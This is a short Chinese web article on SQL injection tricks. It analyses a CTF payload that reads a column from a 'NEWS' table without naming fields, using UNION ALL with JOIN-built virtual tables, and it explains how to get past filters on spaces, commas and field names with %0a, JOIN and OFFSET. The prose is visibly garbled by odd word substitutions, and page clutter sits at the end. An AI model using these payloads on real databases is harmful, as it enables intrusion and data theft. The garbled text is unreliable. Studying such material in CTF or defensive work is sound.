先上一道ctf题的payload进行分析:
- -1 UNION ALL SELECT * FROM ((SELECT 1)a JOIN (SELECT F.4 from (SELECT * FROM (SELECT 1)u JOIN (SELECT 2)i JOIN (SELECT 3)o JOIN (SELECT 4)r UNION SELECT * FROM NEWS LIMIT 1 OFFSET 4)F)b JOIN (SELECT 3)c JOIN (SELECT 4)d)
这本是一道ctf题,前面估计是where后面的子句。这道题过滤了三样器械:1、空格,2、逗号,3、字段名
这里不具体说绕过,办法很多,空格应用%0a绕过,union指令中的逗号应用join绕过,limit指令中的逗号应用offset绕过。
这里因为payload中不克不及出现字段名,是以我们创建了一个与所查表字段数雷同的虚拟表并对其并将其萌芽结不雅与前面的萌芽union起来。具体来说是如许:
-- 比如说袈溱原萌芽的第二字段处出数据
- ... where ...
- union all
- select * from(
- (select 1)a join(
- select F.[须要萌芽的字段号] from(
- select * from [须要萌芽的表有若干个字段就join若干个]
- union
推荐阅读
【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦! 一、弱电智能化的内涵在>>>详细阅读
本文标题:关于SQL注入的一些技巧分享
地址:http://www.17bianji.com/lsqh/37551.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示